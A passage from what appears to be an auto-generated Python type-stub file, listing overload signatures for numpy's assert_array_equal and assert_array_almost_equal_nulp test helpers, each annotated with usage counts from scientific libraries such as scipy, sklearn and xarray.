def assert_array_almost_equal_nulp(x: numpy.ndarray, y: numpy.ndarray, nulp: int):
"""
usage.scipy: 44
"""
...
@overload
def assert_array_almost_equal_nulp(x: numpy.ndarray, y: numpy.ndarray, nulp: float):
"""
usage.scipy: 4
"""
...
@overload
def assert_array_almost_equal_nulp(x: int, y: int, nulp: int):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal_nulp(x: float, y: float, nulp: int):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal_nulp(x: numpy.float64, y: numpy.float64, nulp: int):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal_nulp(x: float, y: numpy.float64, nulp: int):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal_nulp(x: numpy.matrix, y: numpy.ndarray):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal_nulp(x: numpy.float64, y: numpy.float64):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal_nulp(x: numpy.float64, y: float, nulp: int):
"""
usage.scipy: 1
"""
...
def assert_array_almost_equal_nulp(
x: object,
y: Union[numpy.ndarray, numpy.ma.core.MaskedArray, float, int, numpy.float64],
nulp: Union[int, float] = ...,
):
"""
usage.matplotlib: 1
usage.scipy: 67
usage.skimage: 4
"""
...
@overload
def assert_array_equal(x: List[int], y: List[int]):
"""
usage.matplotlib: 5
usage.scipy: 25
usage.skimage: 6
usage.sklearn: 13
usage.xarray: 2
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: numpy.ndarray):
"""
usage.dask: 22
usage.matplotlib: 106
usage.scipy: 663
usage.skimage: 321
usage.sklearn: 919
usage.xarray: 164
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: int):
"""
usage.scipy: 7
usage.skimage: 13
usage.sklearn: 10
"""
...
@overload
def assert_array_equal(x: Tuple[numpy.uint8, numpy.uint8], y: List[int]):
"""
usage.skimage: 1
"""
...
@overload
def assert_array_equal(x: Tuple[int, int], y: List[int]):
"""
usage.skimage: 2
usage.sklearn: 1
usage.xarray: 5
"""
...
@overload
def assert_array_equal(x: Tuple[numpy.float64, numpy.float64], y: List[float]):
"""
usage.skimage: 1
"""
...
@overload
def assert_array_equal(x: Tuple[float, float], y: List[float]):
"""
usage.skimage: 1
"""
...
@overload
def assert_array_equal(x: Tuple[int, int], y: Tuple[int, int]):
"""
usage.scipy: 38
usage.skimage: 3
usage.sklearn: 10
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[int]):
"""
usage.matplotlib: 10
usage.scipy: 108
usage.skimage: 11
usage.sklearn: 190
usage.xarray: 7
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: Tuple[bool, bool, bool, bool]):
"""
usage.skimage: 1
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: Tuple[float, float]):
"""
usage.skimage: 3
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: Tuple[int, int]):
"""
usage.skimage: 1
usage.xarray: 2
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[List[List[Tuple[int, int]]]]):
"""
usage.skimage: 3
"""
...
@overload
def assert_array_equal(x: List[Tuple[int, int]], y: List[Tuple[int, int]]):
"""
usage.scipy: 3
usage.skimage: 8
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[List[int]]):
"""
usage.matplotlib: 12
usage.scipy: 56
usage.skimage: 12
usage.sklearn: 33
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[List[float]]):
"""
usage.matplotlib: 1
usage.scipy: 8
usage.skimage: 6
usage.sklearn: 14
"""
...
@overload
def assert_array_equal(x: int, y: int):
"""
usage.matplotlib: 3
usage.scipy: 8
usage.skimage: 7
usage.sklearn: 2
usage.xarray: 1
"""
...
@overload
def assert_array_equal(x: skimage.util._map_array.ArrayMap, y: numpy.ndarray):
"""
usage.skimage: 8
"""
...
@overload
def assert_array_equal(x: Tuple[int, int, int], y: Tuple[float, float, int]):
"""
usage.skimage: 3
"""
...
@overload
def assert_array_equal(x: Tuple[int, int], y: Tuple[float, float]):
"""
usage.skimage: 2
"""
...
@overload
def assert_array_equal(x: Tuple[int], y: numpy.ndarray):
"""
usage.skimage: 4
"""
...
@overload
def assert_array_equal(x: Tuple[int, int], y: numpy.ndarray):
"""
usage.skimage: 4
"""
...
@overload
def assert_array_equal(x: Tuple[int, int, int], y: numpy.ndarray):
"""
usage.skimage: 4
"""
...
@overload
def assert_array_equal(x: Tuple[int, int, int, int], y: numpy.ndarray):
"""
usage.skimage: 4
"""
...
@overload
def assert_array_equal(x: Tuple[int, int, int], y: Tuple[int, int, int]):
"""
usage.scipy: 29
usage.skimage: 1
usage.sklearn: 2
"""
...
@overload
def assert_array_equal(x: netCDF4._netCDF4.Variable, y: numpy.ndarray):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(x: Tuple[int], y: Tuple[int]):
"""
usage.scipy: 33
usage.sklearn: 3
usage.xarray: 1
"""
...
@overload
def assert_array_equal(x: numpy.ma.core.MaskedArray, y: numpy.ma.core.MaskedArray):
"""
usage.matplotlib: 3
usage.xarray: 2
"""
...
@overload
def assert_array_equal(
x: List[Literal["strings", "of", "list"]], y: List[Literal["strings", "of", "list"]]
):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(x: List[Literal["one element"]], y: Literal["one element"]):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(x: Tuple[float, float, float], y: List[float]):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(x: Tuple[float], y: List[float]):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: pandas.core.indexes.numeric.Int64Index):
"""
usage.xarray: 3
"""
...
@overload
def assert_array_equal(
x: pandas.core.indexes.datetimes.DatetimeIndex,
y: pandas.core.indexes.datetimes.DatetimeIndex,
):
"""
usage.xarray: 2
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: xarray.coding.strings.StackedBytesArray):
"""
usage.xarray: 2
"""
...
@overload
def assert_array_equal(x: xarray.coding.strings.StackedBytesArray, y: numpy.ndarray):
"""
usage.xarray: 2
"""
...
@overload
def assert_array_equal(x: int, y: numpy.int64):
"""
usage.scipy: 1
usage.xarray: 2
"""
...
@overload
def assert_array_equal(x: List[int], y: numpy.ndarray):
"""
usage.matplotlib: 1
usage.scipy: 3
usage.sklearn: 26
usage.xarray: 4
"""
...
@overload
def assert_array_equal(x: List[List[int]], y: numpy.ndarray):
"""
usage.sklearn: 22
usage.xarray: 1
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: numpy.int64):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(x: List[float], y: numpy.ndarray):
"""
usage.matplotlib: 1
usage.scipy: 1
usage.xarray: 3
"""
...
@overload
def assert_array_equal(x: numpy.int32, y: numpy.int64):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(
x: numpy.ndarray, y: pandas.core.indexes.datetimes.DatetimeIndex
):
"""
usage.xarray: 3
"""
...
@overload
def assert_array_equal(x: numpy.timedelta64, y: numpy.ndarray):
"""
usage.xarray: 2
"""
...
@overload
def assert_array_equal(
x: Dict[Literal["attr"], Literal["da"]], y: Dict[Literal["attr"], Literal["da"]]
):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(
x: Dict[Literal["attr"], Literal["da_coord"]],
y: Dict[Literal["attr"], Literal["da_coord"]],
):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(
x: Dict[Literal["attr"], Literal["ds"]], y: Dict[Literal["attr"], Literal["ds"]]
):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(x: xarray.conventions.BoolTypeArray, y: numpy.ndarray):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(x: xarray.conventions.NativeEndiannessArray, y: numpy.ndarray):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(
x: numpy.ndarray, y: List[Literal["2265-10-28T00:00:00", "2000-01-01T00:00:00"]]
):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(
x: xarray.core.variable.Variable, y: xarray.core.dataarray.DataArray
):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(x: xarray.core.dataarray.DataArray, y: numpy.ndarray):
"""
usage.xarray: 6
"""
...
@overload
def assert_array_equal(
x: xarray.core.dataarray.DataArray, y: xarray.core.variable.Variable
):
"""
usage.xarray: 7
"""
...
@overload
def assert_array_equal(
x: xarray.core.dataarray.DataArray, y: xarray.core.dataarray.DataArray
):
"""
usage.xarray: 9
"""
...
@overload
def assert_array_equal(x: range, y: List[int]):
"""
usage.sklearn: 1
usage.xarray: 2
"""
...
@overload
def assert_array_equal(
x: pandas.core.indexes.base.Index, y: pandas.core.indexes.base.Index
):
"""
usage.sklearn: 1
usage.xarray: 3
"""
...
@overload
def assert_array_equal(x: Literal["x"], y: Literal["x"]):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(
x: pandas.core.indexes.base.Index, y: List[Literal["c", "b", "a"]]
):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(x: pandas.core.indexes.numeric.Int64Index, y: List[int]):
"""
usage.xarray: 5
"""
...
@overload
def assert_array_equal(x: Literal["foo"], y: Literal["foo"]):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(x: numpy.ma.core.MaskedArray, y: numpy.ndarray):
"""
usage.matplotlib: 2
usage.xarray: 1
"""
...
@overload
def assert_array_equal(x: xarray.core.dataarray.DataArray, y: numpy.float64):
"""
usage.xarray: 3
"""
...
@overload
def assert_array_equal(
x: xarray.core.dataarray.DataArray, y: pandas.core.series.Series
):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(x: xarray.core.dataarray.DataArray, y: List[Literal["b", "a"]]):
"""
usage.xarray: 2
"""
...
@overload
def assert_array_equal(x: xarray.core.dataarray.DataArray, y: List[str]):
"""
usage.xarray: 2
"""
...
@overload
def assert_array_equal(x: xarray.core.dataarray.DataArray, y: List[Literal["b"]]):
"""
usage.xarray: 3
"""
...
@overload
def assert_array_equal(x: xarray.core.dataarray.DataArray, y: List[int]):
"""
usage.xarray: 2
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: Literal["DJF"]):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(
x: List[Literal["SON", "JJA", "MAM", "DJF"]], y: xarray.core.dataarray.DataArray
):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(
x: xarray.core.dataarray.DataArray, y: xarray.coding.cftimeindex.CFTimeIndex
):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: xarray.core.dataarray.DataArray):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(x: dask.array.core.Array, y: numpy.ndarray):
"""
usage.dask: 12
usage.xarray: 4
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: numpy.float64):
"""
usage.scipy: 1
usage.sklearn: 5
usage.xarray: 2
"""
...
@overload
def assert_array_equal(x: None, y: None):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[bool]):
"""
usage.scipy: 5
usage.sklearn: 1
usage.xarray: 1
"""
...
@overload
def assert_array_equal(
x: slice[numpy.int64, numpy.int64, numpy.int64], y: slice[int, int, int]
):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(
x: pandas.core.indexes.multi.MultiIndex, y: pandas.core.indexes.multi.MultiIndex
):
"""
usage.xarray: 2
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: xarray.core.variable.Variable):
"""
usage.xarray: 2
"""
...
@overload
def assert_array_equal(
x: xarray.core.variable.Variable, y: xarray.core.variable.Variable
):
"""
usage.xarray: 9
"""
...
@overload
def assert_array_equal(x: xarray.core.indexing.CopyOnWriteArray, y: numpy.ndarray):
"""
usage.xarray: 3
"""
...
@overload
def assert_array_equal(x: xarray.core.indexing.MemoryCachedArray, y: numpy.ndarray):
"""
usage.xarray: 2
"""
...
@overload
def assert_array_equal(x: Tuple[numpy.ndarray], y: List[numpy.ndarray]):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(x: numpy.float64, y: numpy.float64):
"""
usage.scipy: 1
usage.sklearn: 8
usage.xarray: 2
"""
...
@overload
def assert_array_equal(x: bool, y: bool):
"""
usage.scipy: 1
usage.xarray: 2
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: dask.array.core.Array):
"""
usage.xarray: 2
"""
...
@overload
def assert_array_equal(
x: pandas.core.indexes.datetimes.DatetimeIndex, y: numpy.ndarray
):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(x: int, y: numpy.float64):
"""
usage.scipy: 2
usage.xarray: 1
"""
...
@overload
def assert_array_equal(x: numpy.float64, y: float):
"""
usage.scipy: 2
usage.sklearn: 1
usage.xarray: 1
"""
...
@overload
def assert_array_equal(x: numpy.int32, y: int):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(x: xarray.core.variable.Variable, y: numpy.ndarray):
"""
usage.xarray: 38
"""
...
@overload
def assert_array_equal(x: xarray.core.variable.Variable, y: numpy.int64):
"""
usage.xarray: 9
"""
...
@overload
def assert_array_equal(x: object, y: numpy.ndarray):
"""
usage.xarray: 3
"""
...
@overload
def assert_array_equal(x: xarray.core.variable.Variable, y: object):
"""
usage.xarray: 23
"""
...
@overload
def assert_array_equal(
x: pandas.core.indexes.timedeltas.TimedeltaIndex,
y: pandas.core.indexes.timedeltas.TimedeltaIndex,
):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(
x: xarray.coding.cftimeindex.CFTimeIndex, y: xarray.coding.cftimeindex.CFTimeIndex
):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(x: pandas.core.indexes.frozen.FrozenList, y: List[List[int]]):
"""
usage.xarray: 2
"""
...
@overload
def assert_array_equal(x: pandas.core.indexes.base.Index, y: List[Literal["a", "b"]]):
"""
usage.xarray: 2
"""
...
@overload
def assert_array_equal(x: xarray.core.variable.IndexVariable, y: numpy.ndarray):
"""
usage.xarray: 4
"""
...
@overload
def assert_array_equal(
x: xarray.core.variable.IndexVariable, y: xarray.core.variable.Variable
):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(x: xarray.core.variable.IndexVariable, y: numpy.int64):
"""
usage.xarray: 2
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: xarray.core.variable.IndexVariable):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[Union[int, float]]):
"""
usage.matplotlib: 1
usage.scipy: 5
usage.sklearn: 2
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[float]):
"""
usage.matplotlib: 1
usage.scipy: 44
usage.sklearn: 11
"""
...
@overload
def assert_array_equal(x: Tuple[numpy.ndarray, numpy.ndarray], y: numpy.ndarray):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[Union[float, int]]):
"""
usage.scipy: 4
usage.sklearn: 2
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: list):
"""
usage.scipy: 34
usage.sklearn: 5
"""
...
@overload
def assert_array_equal(x: Tuple[None, ...], y: Tuple[None, ...]):
"""
usage.scipy: 5
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.ndarray):
"""
usage.scipy: 20
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[List[bool]]):
"""
usage.matplotlib: 1
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: int):
"""
usage.scipy: 1
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[Literal[" "]]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: numpy.memmap):
"""
usage.scipy: 7
usage.sklearn: 2
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: numpy.ndarray, err_msg: str):
"""
usage.scipy: 14
usage.sklearn: 35
"""
...
@overload
def assert_array_equal(x: List[Union[int, float]], y: numpy.ndarray):
"""
usage.scipy: 1
usage.sklearn: 2
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[numpy.float64]):
"""
usage.matplotlib: 6
usage.scipy: 6
usage.sklearn: 8
"""
...
@overload
def assert_array_equal(
x: List[Tuple[Union[None, numpy.float64], Union[numpy.float64, None]]],
y: List[Tuple[Union[None, int], Union[int, None]]],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(
x: List[Tuple[numpy.int64, Union[None, numpy.float64]]],
y: List[Tuple[int, Union[None, int]]],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(
x: List[Tuple[None, Union[None, numpy.float64]]],
y: List[Tuple[None, Union[None, int]]],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(
x: List[Tuple[Union[None, numpy.float64], numpy.int64]],
y: List[Tuple[Union[None, int], int]],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(
x: List[Tuple[Union[None, numpy.float64], None]],
y: List[Tuple[Union[None, int], None]],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(
x: List[Tuple[numpy.int64, numpy.int64]], y: List[Tuple[int, int]]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: List[Tuple[None, None]], y: List[Tuple[None, None]]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: float, y: float):
"""
usage.scipy: 2
usage.sklearn: 2
"""
...
@overload
def assert_array_equal(
x: Tuple[numpy.ndarray, numpy.ndarray], y: Tuple[numpy.ndarray, numpy.ndarray]
):
"""
usage.scipy: 3
"""
...
@overload
def assert_array_equal(x: numpy.bool_, y: bool):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[List[Union[int, float]]]):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(x: list, y: list):
"""
usage.matplotlib: 2
usage.scipy: 3
usage.sklearn: 2
"""
...
@overload
def assert_array_equal(x: List[numpy.complex128], y: List[numpy.complex128]):
"""
usage.scipy: 15
"""
...
@overload
def assert_array_equal(x: List[numpy.float64], y: List[numpy.float64]):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(x: List[List[numpy.ndarray]], y: List[List[numpy.ndarray]]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[complex]):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[List[complex]]):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: numpy.complex128):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.ndarray, err_msg: str):
"""
usage.scipy: 4
"""
...
@overload
def assert_array_equal(x: List[numpy.float64], y: int):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix):
"""
usage.scipy: 264
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: numpy.float64, y: int):
"""
usage.scipy: 2
usage.sklearn: 3
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: numpy.matrix):
"""
usage.scipy: 18
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: List[List[int]]):
"""
usage.scipy: 28
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: List[List[Union[float, int]]]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: List[List[Union[int, float]]]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(
x: numpy.matrix, y: numpy.matrix, err_msg: Literal["slice(None, 2, None)"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(
x: numpy.matrix, y: numpy.matrix, err_msg: Literal["slice(1, 2, None)"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(
x: numpy.matrix, y: numpy.matrix, err_msg: Literal["slice(3, None, None)"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(
x: numpy.matrix, y: numpy.matrix, err_msg: Literal["slice(3, None, 2)"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(
x: numpy.matrix, y: numpy.matrix, err_msg: Literal["slice(8, 3, -1)"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(
x: numpy.matrix, y: numpy.matrix, err_msg: Literal["slice(4, None, -2)"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["0"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["1"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: str):
"""
usage.scipy: 4
"""
...
@overload
def assert_array_equal(
x: numpy.matrix, y: numpy.matrix, err_msg: Literal["slice(1, 5, None)"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["-1"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["-2"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["-5"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["array(-1)"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["-3"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(
x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(slice(8, 3, -1), 0)"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(
x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(slice(8, 3, -1), 1)"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(
x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(0, slice(8, 3, -1))"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(
x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(1, slice(8, 3, -1))"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(
x: numpy.matrix, y: numpy.matrix, err_msg: Literal["slice(None, 5, -1)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(0, 0)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(0, 1)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(0, -1)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(0, -2)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(0, -5)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(
x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(0, array(-1))"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(0, -3)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(1, 0)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(1, 1)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(1, -1)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(1, -2)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(1, -5)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(
x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(1, array(-1))"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(1, -3)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-1, 0)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-1, 1)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-1, -1)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-1, -2)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-1, -5)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(
x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-1, array(-1))"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-1, -3)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-2, 0)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-2, 1)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-2, -1)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-2, -2)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-2, -5)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(
x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-2, array(-1))"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-2, -3)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-5, 0)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-5, 1)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-5, -1)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-5, -2)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-5, -5)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(
x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-5, array(-1))"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-5, -3)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(
x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(array(-1), 0)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(
x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(array(-1), 1)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(
x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(array(-1), -1)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(
x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(array(-1), -2)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(
x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(array(-1), -5)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(
x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(array(-1), -3)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-3, 0)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-3, 1)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-3, -1)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-3, -2)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-3, -5)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(
x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-3, array(-1))"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-3, -3)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.int64, y: numpy.int64):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(x: numpy.int64, y: int):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: numpy.int64, err_msg: str):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(x: Tuple[numpy.float64, numpy.int64], y: Tuple[float, int]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(
